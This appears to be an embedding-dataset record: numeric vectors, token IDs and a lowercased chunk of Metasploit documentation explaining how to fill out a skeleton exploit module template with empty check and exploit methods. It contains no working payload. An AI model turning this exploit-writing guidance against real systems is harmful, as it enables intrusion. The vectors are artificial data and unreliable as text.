-0.760613739490509, 0.6096051335334778, -0.17550550401210785, 0.14061899483203888, 0.5726534128189087, -0.25431036949157715, -0.3521358072757721, -0.4129190444946289, -0.4874376356601715, 0.7142524123191833, -0.31570717692375183, 0.5686406493186951, 0.9624583721160889, 0.5076068639755249, 0.45794621109962463, -0.11198575049638748, -0.18324501812458038, -0.15819285809993744, 0.6186311841011047, 0.2573454976081848, 0.6645377278327942, -0.12297272682189941, 0.4496716260910034, 0.6145675778388977, -1.398956537246704, -0.2670898735523224, 0.4645538330078125, 0.1496179848909378, -0.44230538606643677, 0.21810312569141388, -0.6340938210487366, 0.3507571518421173, 0.12075492739677429, -0.1866026073694229, 0.3130643665790558, 0.03275148570537567, 0.5422071814537048, -0.3679197132587433, -0.2806077301502228, 0.6476860046386719, -0.29129284620285034, 0.7443099617958069, 0.03016282059252262, -0.23389983177185059, 0.5317572951316833, 0.38454732298851013, -0.8024260997772217, 0.22427521646022797, 1.0490368604660034, 0.2385234236717224, -0.7457934617996216, 0.2818009555339813, 0.04673588648438454, 0.19895808398723602, 0.0493062362074852, 0.357273668050766, -0.6412377953529358, 0.4419974982738495, 0.2493034303188324, -0.6662627458572388, -0.8437284827232361, 0.10644367337226868, 0.17127268016338348, 0.15969330072402954, 0.09368517249822617, 0.06748663634061813, 0.3501800298690796, -0.46503907442092896, 0.6746732592582703, -0.648148775100708, -0.07928991317749023, 0.18206514418125153, -0.08436110615730286, -0.27201229333877563, 0.8721367120742798, 0.3844277858734131, 0.6488295793533325, 0.05367127060890198, 0.9899134635925293, -0.12052533775568008, 0.057451341301202774, 0.03161175921559334, -0.8270031213760376, -0.035796958953142166, -0.8845042586326599, -0.34813570976257324, -0.35207849740982056, 0.27956441044807434, -0.4608398675918579, 0.620084285736084, -0.3372593820095062, -0.05356242135167122, -0.3116286098957062, -0.01859460212290287, -0.43414488434791565, -0.5291815400123596, 0.5326424241065979, -0.3957621455192566, -0.701256275177002, -0.40168946981430054, 0.358024537563324, 0.22273170948028564, 0.11699157953262329, -0.29857006669044495, -0.6030032634735107, -0.20095248520374298, -0.2919940948486328, -0.0781257152557373, 0.833329439163208, 0.031797368079423904, -0.10823490470647812, 0.3065589964389801, -0.5820457339286804, -0.3561650514602661, 0.22083811461925507, -0.5003771185874939, -0.433716356754303, 0.871466875076294, 0.11367099732160568, 0.5282878875732422, 0.18310019373893738, -0.09330645948648453, -0.2513216435909271, 0.2801765203475952, 0.6462805271148682, -0.31525298953056335, 0.4155745208263397, 0.3813408613204956, 0.11654379218816757, 0.26288536190986633, -0.3007773756980896, 0.608766496181488, -0.9801315069198608, -0.7137047052383423, 0.1872662454843521, -0.1839923858642578, -0.6870816946029663, -0.6193177700042725, 0.36182287335395813, -0.48089101910591125, 0.3506163954734802, -0.22498032450675964, -1.0844911336898804, -0.7966786026954651, -0.6682776808738708, 0.13402540981769562, 0.022455712780356407, 0.20369121432304382, -0.1270102709531784, -0.017342321574687958, 1.3444970846176147, -0.7752236127853394, 4.446224212646484, 0.417877733707428, -0.34516164660453796, 0.2952006757259369, -0.06058882176876068, 0.6475178599357605, 1.0382914543151855, -0.10950437933206558, 0.7863467335700989, -0.4935978651046753, -0.11811794340610504, -0.21825449168682098, 0.009237618185579777, 0.5456995368003845, 0.8100581765174866, 0.1861344873905182, -0.3290831744670868, 0.27553701400756836, 0.017463723197579384, -0.9265420436859131, -1.145323395729065, 0.25685974955558777, -0.1914229840040207, 0.9053146839141846, 0.31826937198638916, 0.2593655288219452, 0.11328890174627304, -0.524909496307373, 0.5425592660903931, 0.33191579580307007, 0.22325590252876282, 0.26054608821868896, 0.6066513657569885, -0.779129147529602, 0.04854542016983032, 0.13768543303012848, 0.13600730895996094, -0.12954309582710266, -0.6907709836959839, -0.6436153054237366, 0.20837000012397766, 0.37001264095306396, 0.009900364093482494, -0.28358253836631775, 0.38024356961250305, 0.9852876663208008, -0.16557656228542328, -0.1905355602502823, 0.5098056197166443, -0.5093263983726501, 0.38709813356399536, -0.13201667368412018, 0.7023714780807495, 0.013699458912014961, -0.37610331177711487, 0.4608962833881378, 0.3124831020832062, -0.12318427860736847, 0.054930612444877625, -0.1882583051919937, -0.10489784926176071, -0.38861024379730225, 0.23431377112865448, -0.18241029977798462, -0.25485625863075256, 0.21625949442386627, -0.3971206843852997, 0.48838648200035095, 0.008654619567096233, -0.26966530084609985, 0.16149909794330597, 0.14340727031230927, -0.1140618547797203, -0.5230979323387146, 0.9099532961845398, -0.2072656899690628, -0.41608425974845886, 0.1270311176776886, 0.7047707438468933, -0.3926640450954437, -0.08530119806528091, -0.3966885209083557, -0.8529627919197083, 0.6868152618408203, 0.5425384044647217, 0.21916216611862183, 0.26553553342819214, -0.8054807186126709, -0.4190441071987152, 0.6929852962493896, 0.5296579003334045, 0.15008144080638885, -0.40894362330436707, 0.900061845779419, 0.11841637641191483 ]
[ 2003, 1996, 6922, 8001, 2411, 2438, 2008, 2009, 2071, 2191, 2115, 18077, 2625, 10539, 1029, 2113, 2008, 1999, 1996, 2613, 2088, 1010, 2115, 18077, 2064, 3338, 2030, 8246, 1999, 1037, 2843, 1997, 2367, 3971, 1012, 2017, 2323, 3046, 2000, 2424, 2041, 1998, 8081, 2009, 2076, 1996, 2458, 1998, 5604, 4403, 2077, 4083, 1996, 2524, 2126, 1012, 5464, 3022, 2017, 2064, 2156, 1010, 15258, 2003, 2590, 2000, 18804, 13102, 4135, 4183, 1010, 1998, 2057, 3046, 2000, 2022, 2062, 5379, 2055, 2023, 2005, 1996, 5198, 1012, 1045, 2113, 2054, 2017, 1521, 2128, 3241, 1024, 1523, 2092, 1010, 2065, 2027, 1521, 2128, 2478, 1996, 18077, 1010, 2027, 2323, 3305, 2129, 2009, 2573, 1010, 2061, 2027, 2113, 2054, 2027, 1521, 2128, 2893, 3209, 2046, 1012, 1524, 1999, 1996, 3819, 2088, 1010, 2748, 1012, 4209, 2129, 1037, 18130, 2573, 2030, 2129, 2019, 18077, 2573, 2097, 2069, 5770, 1996, 5310, 1010, 2021, 2017, 2156, 1010, 2057, 2123, 1521, 1056, 2444, 1999, 1996, 3819, 2088, 1012, 2065, 2017, 1521, 2128, 1999, 1996, 2690, 1997, 1037, 20015, 3231, 1010, 2009, 1521, 1055, 2200, 9832, 2000, 2467, 2424, 1996, 2051, 2000, 28667, 29313, 1996, 8211, 4044, 1010, 6167, 1996, 18077, 2000, 1996, 2087, 3937, 2433, 2000, 2139, 8569, 2290, 2054, 1521, 1055, 2183, 2006, 1010, 1998, 2059, 2079, 5604, 1012, 9592, 2024, 2017, 2031, 1037, 4389, 6134, 2000, 3338, 2046, 1037, 2312, 2897, 1010, 2061, 2017, 2342, 2000, 2224, 2115, 2051, 5362, 1012, 2138, 1997, 2023, 1010, 2009, 1521, 1055, 2590, 2000, 2012, 2560, 2031, 1037, 2204, 6412, 1998, 2204, 7604, 2005, 1996, 11336, 1012, 1998, 1997, 2607, 1010, 1037, 5464, 2291, 2008, 2064, 2022, 9480, 1012, 1996, 18804, 13102, 4135, 4183, 7705, 2038, 2698, 2367, 10385, 2000, 5769, 2129, 10539, 2019, 18077, 2003, 1012, 2156, 18077, 5464, 2005, 2062, 4751, 1012, 23561, 10128, 2017, 2031, 3191, 2023, 2521, 1010, 2057, 2228, 2017, 2024, 3492, 8052, 2138, 2009, 1521, 1055, 1037, 2843, 2000, 17886, 1012, 2017, 2024, 2763, 6603, 2339, 2057, 4033, 1521, 1056, 2018, 1037, 2309, 2240, 1997, 3642, 2000, 3745, 1999, 1996, 4339, 6279, 1012, 2092, 1010, 2004, 2017, 9131, 1010, 18077, 2458, 2003, 3262, 2055, 2115, 7065, 2545, 2075, 4813, 1012, 2065, 2017, 2031, 2035, 2008, 1010, 2057, 5807, 1521, 1056, 2022, 4129, 2017, 2129, 2000, 4339, 2019, 18077, 1012, 2054, 2057, 1521, 2310, 2589, 2061, 2521, 2003, 11504, 2131, 2115, 9273, 3388, 21300, 1011, 1999, 11178, 2055, 2054, 2009, 2965, 2000, 2468, 1037, 18804, 13102, 4135, 4183, 18077, 9722, 2005, 1996, 3036, 2451, 1025, 1996, 2717, 2003, 2062, 2055, 2129, 2000, 2224, 2256, 4666, 7076, 2000, 3857, 2008, 18077, 1012, 2092, 1010, 2045, 2024, 1037, 2843, 1997, 4666, 7076, 1010, 2061, 2009, 1521, 1055, 5263, 2000, 2175, 2058, 2035, 1997, 2068, 1999, 1037, 2309, 3931, 1010, 2061, 2017, 2442, 2593, 3191, 1996, 17928, 12653, 1010, 4493, 3642, 4973, 1010, 2030, 2298, 2005, 2062, 15536, 3211, 5530, 2057, 1521, 2310, 2517, 2000, 3104, 3563, 4666, 7076, 1012, 2005, 2742, 1010, 2065, 2017, 1521, 2128, 2559, 2005, 1037, 4339, 6279, 2055, 2129, 2000, 11835, 2007, 2019, 8299, 8241, 1010, 2017, 2453, 2022, 4699, 1999, 1024, 2129, 2000, 4604, 2019 ]
metasploit
113.txt
1
http request using httpclient. if you ’ re interested in browser exploit writing, definitely check out : how to write a browser exploit using browserexploitserver, etc. but of course, to begin, you most likely need a template to work with, and here it is. we ’ ll also explain how to fill out the required fields : # # # this module requires metasploit : url # current source : url # # class metasploitmodule < msf : : exploit : : remote rank = normalranking def initialize ( info = { } ) super ( update _ info ( info,'name'= >'[ vendor ] [ software ] [ root cause ] [ vulnerability type ] ','description'= > % q { say something that the user might need to know },'license'= > msf _ license,'author'= > ['name'],'references'= > [ ['url ','' ] ],'platform'= >'win ','targets'= > [ ['system or software version ', {'ret'= > 0x41414141 # this will be available in ` target. ret ` } ] ],'payload'= > {'badchars'= > " \ x00 " },'privileged'= > false,'disclosuredate'= >'','defaulttarget'= > 0,'notes'= > {'stability'= > [ crash _ safe ],'reliability'= > [ repeatable _ session ],'sideeffects'= > [ artifacts _ on _ disk, ioc _ in _ logs ] }, ) ) end def check # for the check command end def exploit # main function end end name - the name field should begin with the name of the vendor, followed by the software. ideally, the β€œ root cause ” field means which component or function the bug is found. and finally, the type of vulnerability the module is exploiting. description - the description field should explain what the module does, things to watch out for, specific requirements, the more, the better. the goal is to let the user understand what he ’ s using without the need to actually read the module ’ s source and figure things out. and trust me, most of them don ’ t. author field is where you put your name. the format should be β€œ name β€œ.
[ 0.10132946819067001, -0.2043790966272354, -0.13481223583221436, 0.5035886764526367, -0.6620049476623535, 0.25948992371559143, -0.3358657956123352, 0.06479652971029282, 0.2808850407600403, 0.778721272945404, 0.25633206963539124, -0.576197624206543, 0.37617260217666626, -0.6764380931854248, -0.09787919372320175, -0.19362151622772217, -0.4143292009830475, -0.40571171045303345, -1.0913056135177612, -0.0406997911632061, 0.5341171622276306, -0.21496951580047607, -0.7003823518753052, -0.8581057786941528, -0.16457971930503845, 0.22559472918510437, 0.5725732445716858, -0.13640831410884857, 0.5708284974098206, 0.433156281709671, 0.7394700050354004, -0.1274523138999939, -0.40149986743927, -0.2662728726863861, 0.4635063707828522, -0.16199608147144318, 0.999950110912323, -0.6465556025505066, 0.1341831386089325, -0.2929651737213135, 0.43508461117744446, -0.7359713315963745, 0.10376161336898804, -0.7170150876045227, -0.5693551898002625, -0.4882376194000244, -0.12305713444948196, -0.44093576073646545, 0.7486491203308105, -0.8040193915367126, 0.835625946521759, 0.22919875383377075, 0.3355853855609894, 0.15520691871643066, -0.4650891125202179, -0.19228093326091766, -0.2918623089790344, 0.21955549716949463, -0.7079369425773621, -0.059620048850774765, 0.12476731091737747, 0.7668609619140625, 0.2026847004890442, -0.7727640271186829, -0.055629435926675797, 0.7028828263282776, -0.03117373399436474, 0.09178904443979263, -0.6157048344612122, -0.17932985723018646, -0.513969361782074, 0.3150325417518616, -0.6415095925331116, -0.3815680742263794, -0.5703707337379456, -0.6682116985321045, 0.4896206259727478, -0.1892535239458084, -0.25388437509536743, 0.9462541937828064, -0.04896228760480881, 0.5002591609954834, 0.37373384833335876, -0.21467077732086182, -0.0775022953748703, -0.41109851002693176, 0.5921642780303955, 0.4254348576068878, -0.1089358925819397, -0.03258654102683067, 0.5592572093009949, 0.06748563796281815, -0.04541275277733803, -0.18629221618175507, 0.4604780375957489, 0.8113511204719543, -0.3088640570640564, 0.4249841272830963, 0.015272439457476139, -0.38843196630477905, 1.2649563550949097, 0.9257790446281433, -0.24756094813346863, 0.14708349108695984, -0.16216272115707397, 0.689774751663208, -0.11117638647556305, -0.27034199237823486, -0.313952773809433, -0.6952974796295166, 0.6355804204940796, 0.5476497411727905, -0.07389436662197113, -0.08305199444293976, -0.06357210129499435, 0.49980688095092773, 0.322113573551178, 0.39052942395210266, -0.12181508541107178, 0.42276355624198914, -0.8030330538749695, -0.022243814542889595, -0.5428418517112732, -0.5255685448646545, 0.6570934057235718, 0.11829261481761932, -0.23090294003486633, 0.9458159804344177, -0.8339516520500183, -0.4730229675769806, -0.21894972026348114, 0.038566287606954575, 0.16292428970336914, 0.630703866481781, -0.4342440366744995, 0.2719469666481018, -0.004310083109885454, 0.1528068631887436, 0.3303150236606598, -0.8626455068588257, -0.18305060267448425, -0.08220390230417252, 0.06591382622718811, 1.3763706684112549, 0.7630771398544312, -0.4766519367694855, -0.3974626958370209, -0.20001041889190674, -0.3424704670906067, 0.7599130868911743, -0.5590325593948364, -0.42919236421585083, 0.5416672229766846, -0.16678547859191895, -0.3977227509021759, 0.5508173704147339, -0.3363208770751953, 0.40203338861465454, 0.16730841994285583, -0.44036951661109924, 0.26865944266319275, 1.2120800018310547, 0.01202297955751419, 0.4108532667160034, -0.6871711611747742, 0.4444029629230499, -0.5651578903198242, -0.34821680188179016, -0.6092953681945801, 0.13303051888942719, 0.3674321472644806, 0.41006845235824585, -0.48115208745002747, 0.1555868536233902, 1.2157536745071411, 0.36329635977745056, 0.11038590967655182, -0.20362013578414917, 0.2374086081981659, 0.43698790669441223, -0.42862406373023987, 0.8014523983001709, 0.3662051260471344, 0.9595608115196228, -0.3488820195198059, 0.1904468536376953, -0.4836427867412567, -0.676032543182373, -0.09387486428022385, 0.2329108715057373, 0.3214070200920105, 0.5199742317199707, 0.03816467896103859, 0.06682504713535309, 0.7079015970230103, 0.4675123989582062, -1.0025005340576172, 0.263060599565506, -0.05644369497895241, -1.8021929264068604, -0.18733234703540802, 0.08416096866130829, 0.2545965313911438, 0.4111116826534271, -0.9972495436668396, -0.621482253074646, 0.4253109097480774, 0.8223048448562622, -0.1730157881975174, 0.7233870625495911, 0.9522818326950073, 0.17490491271018982, -0.4083936810493469, -0.06653442233800888, 0.44921788573265076, -0.1269277185201645, -0.4020608067512512, 0.2917095720767975, 0.11627576500177383, 0.5753608345985413, 0.12240706384181976, 0.5997334718704224, 0.7879306077957153, -0.042278967797756195, -0.009306970052421093, -0.12287866324186325, 0.26684683561325073, 0.5004931688308716, -0.6750915050506592, -0.3367688059806824, -0.022234272211790085, 0.5125231146812439, 0.19930513203144073, 1.099671483039856, -0.15940317511558533, -0.14880594611167908, 0.7121312022209167, 0.10917005687952042, 0.4247380197048187, 0.41933131217956543, 0.015539324842393398, 1.1128041744232178, 0.5144250392913818, 0.5273915529251099, -0.018763437867164612, 0.12863360345363617, -0.4629787504673004, -0.0022029634565114975, 0.2737976312637329, 0.6111983060836792, 0.19322967529296875, 0.980418860912323, 0.04276864230632782, -0.7660719156265259, -1.012925624847412, -0.5812661051750183, 0.3588480055332184, 0.8000041246414185, -0.840304970741272, -0.6414401531219482, 0.08780808001756668, 0.26115134358406067, -0.669152021408081, -0.4704633355140686, -0.5535102486610413, 0.6066877841949463, -0.41997015476226807, -0.12268755584955215, 0.0011419035727158189, -1.0737093687057495, -0.773115873336792, -0.5458932518959045, -1.5737825632095337, 0.06661994010210037, -0.7825275659561157, 0.21479395031929016, -0.0031887467484921217, -0.5157034397125244, 0.08045598864555359, -0.3204927146434784, -0.24688684940338135, 0.36272361874580383, 0.016223089769482613, 0.5603758096694946, -0.04937826097011566, -0.17709948122501373, -0.24018576741218567, 0.17708654701709747, -0.0428234301507473, 0.7817826867103577, -0.522267758846283, -0.16889038681983948, -0.459822416305542, -0.5631338953971863, -0.05952583625912666, -0.00015718340000603348, 0.3863978683948517, 0.2906567454338074, 0.20870141685009003, -0.3700420558452606, -0.2606011927127838, -0.33673131465911865, 0.33759060502052307, -0.13115550577640533, -0.5423950552940369, 0.5176018476486206, -0.27469101548194885, -0.491512656211853, 0.31504762172698975, 0.27248910069465637, -0.5781763195991516, 0.8025121092796326, -0.3990345001220703, 0.6241027116775513, -0.5519191026687622, 0.8627745509147644, 0.6458010673522949, 0.2552400827407837, -0.06134302541613579, -0.6442831754684448, 0.04317818209528923, -0.05251152440905571, -0.6716142296791077, -0.7583730816841125, 0.12492232024669647, 0.3170621395111084, 0.578602135181427, -1.1271989345550537, 0.5128458142280579, -0.35438352823257446, -0.3903764486312866, 0.014914366416633129, -0.40549570322036743, 1.5091956853866577, -0.044176872819662094, 0.34813055396080017, -0.12210298329591751, -0.5594232082366943, 0.05240211263298988, -0.013625985011458397, 0.29199519753456116, -0.5312771797180176, 0.43367499113082886, 0.5762943625450134, -0.3013222813606262, 0.35086095333099365, 0.3501276671886444, -0.6886378526687622, -0.05489303916692734, -0.112531378865242, -0.24590760469436646, -0.20174309611320496, 0.17101359367370605, 0.21110793948173523, -0.1218152642250061, 1.0968186855316162, -0.34803879261016846, 0.03191730007529259, 0.5177977681159973, -0.06254018098115921, 0.2438209056854248, 0.4197905361652374, 0.45563334226608276, -0.06327898055315018, -0.8565261960029602, -0.33373531699180603, -0.25612694025039673, 0.8505020141601562, 0.21715763211250305, -0.3178829848766327, 0.565624475479126, -0.25340068340301514, -0.49854570627212524, 0.4033433496952057, 0.11431439965963364, -0.7847177982330322, 1.1164014339447021, 0.0773332267999649, 0.7890146970748901, -0.27432578802108765, 0.06044187396764755, 0.2094845473766327, 0.017469020560383797, 0.2805098295211792, -0.3270268142223358, -0.04484650492668152, -0.1649342179298401, -0.5524225831031799, -0.22884467244148254, -0.710682213306427, -0.1822044849395752, 0.1123257726430893, 0.5300658345222473, -0.14362022280693054, -0.7636672854423523, -0.6657789945602417, 0.6906738877296448, 0.7825706601142883, 0.5969971418380737, 0.5056992769241333, 0.983670711517334, -0.20806720852851868, 0.1614018678665161, 0.39311453700065613, -0.12676145136356354, 0.17534707486629486, -0.032001346349716187, 0.9820886254310608, 0.1740667074918747, 0.34925562143325806, -0.12371868640184402, 0.2914903163909912, -0.42858123779296875, 0.2064257562160492, 0.20456291735172272, 0.3883332908153534, -1.0387954711914062, 0.15742172300815582, 0.3907712996006012, 0.18357211351394653, -0.6358919143676758, -0.5466650724411011, -0.34512409567832947, 0.6771260499954224, 0.6474355459213257, -0.33902719616889954, -0.1682935506105423, -0.8862186670303345, -0.38764438033103943, -0.25594091415405273, 0.19513995945453644, -0.2577109932899475, -0.6834606528282166, -0.19892381131649017, -0.740236759185791, 0.4757413864135742, 0.5080912113189697, 0.2607886493206024, 0.2361016571521759, -0.8662539720535278, -0.0744870975613594, 0.7685179114341736, -0.20727291703224182, -0.24451452493667603, -0.21630370616912842, -0.09640754759311676, 0.1183621808886528, 0.7109782695770264, -0.4086138606071472, -0.23803596198558807, 0.40522170066833496, -0.8382665514945984, 0.8211220502853394, -0.794725239276886, 0.21643470227718353, 0.22662870585918427, 0.3054939806461334, -0.11445010453462601, 0.20391936600208282, -0.5201300382614136, -0.39754828810691833, 0.025173166766762733, 0.2524051070213318, -0.5195402503013611, -0.3771420121192932, 0.6106989979743958, -0.21548065543174744, -0.06354716420173645, 0.07860652357339859, 0.43329936265945435, -0.38923680782318115, 0.5903806090354919, -0.46662771701812744, -0.17319060862064362, 0.14121994376182556, -1.1168322563171387, 0.4404905438423157, 0.47335436940193176, -0.005810595117509365, 0.05010533705353737, -0.7740662693977356, 0.721721887588501, 0.2979603707790375, 0.2981242835521698, -1.0454920530319214, -0.6596810221672058, 0.2946985960006714, 0.619855523109436, 0.19253405928611755, -0.25409212708473206, 0.2106613963842392, -0.44602862000465393, -0.22532199323177338, -0.5172730088233948, -0.7216383814811707, -0.940131425857544, -0.3886810541152954, -0.5400218963623047, 0.14687244594097137, 0.38040658831596375, 0.8190230131149292, -0.29737013578414917, -0.28990164399147034, 0.14549791812896729, 0.019657187163829803, 0.07176996767520905, -0.7423624396324158, -0.4525456726551056, -0.12142480909824371, -0.018066931515932083, -0.26279523968696594, 0.7602561116218567, -0.4467225968837738, -0.26457393169403076, 0.29975906014442444, 0.10375113785266876, 0.2076079249382019, -0.626772940158844, -0.6153852939605713, 0.5992327928543091, -0.18613889813423157, -0.6153992414474487, 0.3573826253414154, 0.08005813509225845, -0.18908095359802246, 0.33769190311431885, 0.1997855007648468, -1.0311208963394165, -1.0750370025634766, -0.5995060205459595, 0.09042075276374817, -0.5678126811981201, -0.22291457653045654, -0.650334358215332, -0.206834614276886, -0.352565735578537, 0.3829170763492584, 0.26389479637145996, -1.328908920288086, -0.18634286522865295, -0.5843938589096069, -0.14157499372959137, -0.32774320244789124, 0.31658419966697693, -0.21129804849624634, -0.5434555411338806, 0.2345292866230011, 0.968467116355896, 0.3231137692928314, -0.044724710285663605, -0.6324521899223328, -0.3091161549091339, 0.46681106090545654, 0.3306260406970978, -0.47271445393562317, -0.5192145705223083, -0.1570890247821808, -0.44321396946907043, -0.2793174386024475, 0.5197424292564392, -0.3506709337234497, 0.6354297995567322, -0.8438931107521057, 0.3509072959423065, -0.025062942877411842, 0.2536240816116333, 0.01074813213199377, 0.3481273949146271, 0.6441425681114197, -0.5150770545005798, 0.3579793870449066, -0.26762762665748596, 0.6183772683143616, 0.5318798422813416, -0.017442943528294563, -0.6313115358352661, 0.34018808603286743, -1.1358294486999512, -0.6628937721252441, 0.6750398874282837, -0.3365241289138794, -0.24943099915981293, -0.4473893642425537, -0.3233910799026489, 0.2594236135482788, -0.36700281500816345, 0.13422554731369019, 0.9575231671333313, 0.5371019244194031, 0.20345081388950348, -1.2728710174560547, 0.3049517273902893, 0.17570804059505463, 0.05016210302710533, 0.579454243183136, 0.27328193187713623, -0.09092900902032852, 0.11799488961696625, 0.04103488102555275, 0.04522569850087166, -0.5126376748085022, -0.01873829960823059, 0.8967439532279968, -0.5394846200942993, 0.6142259240150452, -0.5472420454025269, -0.676623523235321, 0.10590225458145142, 0.3645741045475006, 0.10889744758605957, -0.048017699271440506, 0.40462708473205566, 0.15218520164489746, 0.5133076906204224, 0.031302858144044876, -0.09710998833179474, -0.2316368669271469, -0.08909693360328674, 0.47796058654785156, 0.31824037432670593, -0.24548834562301636, 0.7773834466934204, 0.5656334161758423, -0.681022584438324, -0.3960462212562561, -0.6517546772956848, -0.08924665302038193, 0.19491377472877502, -0.2607361972332001, -0.7169820070266724, 0.5342131853103638, 0.10147122293710709, 0.242271289229393, 0.7435505986213684, 0.07592345029115677, -0.1628548502922058, -0.4987836182117462, 0.24829450249671936, 0.008725828491151333, 0.7729592323303223, 1.062953233718872, -0.7396419644355774, -0.2690854072570801, -0.6883054971694946, -0.34154918789863586, 0.5278055667877197, 0.6038244962692261, 1.1441926956176758, -0.1339043229818344, 0.33948156237602234, -0.06585118919610977, -0.38430437445640564, 0.9426625370979309, -0.6730907559394836, 0.08230336755514145, 0.4626995921134949, -0.6727594137191772, -1.0982974767684937, -0.7860390543937683, 0.08459966629743576, -0.014070890843868256, 0.10499389469623566, -0.40124043822288513, -0.12896676361560822, 0.19483187794685364, -0.33113893866539, -0.707827627658844, -0.7722107172012329, -0.5523784160614014, -0.8084704279899597, 0.12781783938407898, 0.5628926753997803, -0.09021317213773727, -0.12620963156223297, -0.2213769406080246, -0.13291716575622559, -0.4129554033279419, 0.2171805202960968, 0.26300421357154846, -0.35008877515792847, 0.3591736853122711, -0.4472348988056183, 0.6492272615432739, -0.4284149408340454, -0.08962901681661606, -0.46564412117004395, -0.48796752095222473, 0.09555502980947495, -1.0002449750900269, -0.21298135817050934, 0.16665038466453552, -0.5840042233467102, 0.5767145156860352, -0.49816402792930603, 0.03330971300601959, -0.15303221344947815, -0.5915917158126831, 0.7425413727760315, 0.21887032687664032, -1.0544166564941406, 0.14419683814048767, -0.14331500232219696, 0.06099000573158264, 0.38934585452079773, -0.5989449620246887, -0.11865618824958801, 0.03491499274969101, 0.31649187207221985, 0.4804212152957916, 0.3280373811721802, -0.29852867126464844, -0.1254357397556305, -0.17647571861743927, -0.8690193891525269, -0.20813621580600739, -0.35913482308387756, -0.3018721342086792, 0.22727128863334656, -0.04311240091919899, 0.31223830580711365, 0.9062168598175049, 0.2947101294994354, 0.27853304147720337, -0.6545892953872681, 0.2561222016811371, 1.0115348100662231, -0.17995108664035797, -0.4891152083873749, 0.3948677182197571, 0.44815319776535034, -0.11471882462501526, 0.202936589717865, 0.6834362149238586, -0.2920234203338623, 0.014473496936261654, -0.035793766379356384, -0.02081417106091976, -0.9827850461006165, 0.3398190140724182, -0.0308242067694664, 0.4421817660331726, 0.34732475876808167, 0.19272640347480774, 0.32885023951530457, -0.5006468892097473, -0.2155800610780716, 0.35951077938079834, -0.7188906073570251, -0.275450199842453, 0.2942899763584137, -0.5978871583938599, -0.19976715743541718, -0.37671908736228943, -0.2142753005027771, -0.018759040161967278, 0.20546333491802216, 0.20156140625476837, 0.5815912485122681, -0.25535619258880615, 0.009957644157111645, 0.9176308512687683, -0.8252807855606079, 0.16853433847427368, -0.5595104098320007, 0.20724433660507202, -0.4677230417728424, -1.1273106336593628, 0.0986861139535904, 0.8122872710227966, 0.39504894614219666, -0.07300718128681183, -0.34924402832984924, 0.24750889837741852, 0.08447486907243729, -0.05990799888968468, -0.046184420585632324, 0.10671588033437729, -0.6412364840507507, 0.5043651461601257, -0.8540357947349548, 0.44272148609161377, 0.06598042696714401, -0.2618294954299927, 0.4990255832672119, 0.04500246420502663, -0.09909109771251678, 0.5299679040908813, -0.0937914103269577, 0.27879050374031067, 0.7681499719619751, 0.7721883654594421, 0.3768419623374939, -0.33985403180122375, 0.0018798229284584522, -0.28371748328208923, 0.3411753475666046, 0.44629955291748047, 0.41378360986709595, 0.23363861441612244, 0.19300158321857452, 0.9644793272018433, -1.108149528503418, 0.3387955129146576, 0.5182538628578186, -0.19457197189331055, -0.5503246784210205, 0.2853045165538788, 0.20023581385612488, 0.4957861304283142, 0.4436943531036377, -0.6111003756523132, 0.5782070159912109, -0.12309370934963226, -0.26407483220100403, 0.08173222839832306, -0.36790648102760315, 0.6338431239128113, -0.7358074188232422, 0.5823304057121277, -0.25586986541748047, -0.21143849194049835, 0.0464649423956871, 0.4415224492549896, -0.5311620235443115, 0.3585626482963562, 1.09978449344635, 0.3958459198474884, -0.4237893223762512, 0.6766583919525146, -0.23205482959747314, 0.49127545952796936, 0.14611288905143738, -0.02366618998348713, -0.2369081825017929, 0.055790405720472336, 0.16184788942337036, -1.019484043121338, -0.9432154893875122, -0.1283150017261505, 0.2333798110485077, 0.43987247347831726, 0.4360496699810028, -0.057858146727085114, 0.08879939466714859, -0.2770300805568695, 0.4799977242946625, -0.00988452322781086, -0.06969581544399261, 0.7028673887252808, -0.5200503468513489, -0.6016364693641663, 0.6934381723403931, 0.5389821529388428, 0.41579917073249817, 0.12115355581045151, 0.9417390823364258, -0.24379080533981323, 0.3797948956489563, -0.05026233568787575, -0.5344341397285461, -0.2695620357990265, -0.039399564266204834, -0.4929253160953522, -0.503879964351654, 0.58347088098526, -0.28397849202156067, 0.6069742441177368, -0.03231707587838173, -0.10808080434799194, -0.8501614928245544, -0.43156999349594116, -0.19164814054965973, -0.6002969145774841, 0.6608170866966248, 0.05718400329351425, -0.6937578320503235, -0.00001014283043332398, -0.15518952906131744, 0.3540007472038269, 0.39689943194389343, -0.7691975831985474, -0.05572349205613136, -0.2519279718399048, -0.313655823469162, -0.8165493607521057, 1.023605465888977, -0.6340780854225159, -0.45195940136909485, -0.37193387746810913, -0.4741307497024536, -0.4566364884376526, 0.2689821422100067, -0.5209016799926758, -0.30274498462677, 0.41538918018341064, 0.5112901926040649, 0.22643135488033295, 0.9105175137519836, -0.24454377591609955, 0.14505712687969208, 0.2855835556983948, 0.5096149444580078, 0.3584809899330139, 1.0157970190048218, -0.11157577484846115, 0.04234674945473671, 0.5313195586204529, -0.3767628073692322, 0.4095744788646698, -0.16063962876796722, -0.2636706233024597, -0.43253710865974426, -0.045446012169122696, -0.8318480849266052, -0.5125699043273926, 0.32096928358078003, 0.42065513134002686, -0.012302206829190254, -0.9497796297073364, -1.2537564039230347, -0.27720192074775696, -0.9960474371910095, 0.034608516842126846, -0.12036202847957611, -0.0022244458086788654, 0.4071643352508545, 0.43890753388404846, 0.6678546667098999, -1.1604866981506348, 4.35466194152832, 0.7618154287338257, -0.24895049631595612, 0.08151884377002716, 0.04615747928619385, 0.7679784297943115, 1.1098664999008179, -0.09480147808790207, -0.04550784081220627, -0.7923093438148499, -0.15499453246593475, 0.024817438796162605, 0.3726455569267273, 1.040785789489746, 0.5575398206710815, 0.6478812098503113, -0.659931480884552, -0.5170673727989197, 0.17541317641735077, -0.9221569895744324, -0.8994454145431519, -0.3508699834346771, -0.44772952795028687, 1.0195088386535645, 0.7969273328781128, 0.21698009967803955, 0.15288405120372772, -0.48621314764022827, 0.03833591938018799, -0.17349344491958618, -0.04558036848902702, -0.49511754512786865, 0.5083047151565552, -0.3971613943576813, -0.3814482092857361, -0.22894786298274994, -0.20322583615779877, -0.8498935699462891, -0.6285122632980347, -0.41266438364982605, 0.3957531452178955, -0.11604257673025131, 0.22807925939559937, -0.35711589455604553, 0.7325056791305542, 1.0196610689163208, -0.34848013520240784, 0.2842164933681488, 0.3312956988811493, -0.8011101484298706, 0.5233845114707947, 0.06272607296705246, 0.5109753012657166, 0.2083737850189209, -0.4796806573867798, 0.5026392936706543, 0.4802805185317993, -0.652321994304657, -0.04470962658524513, 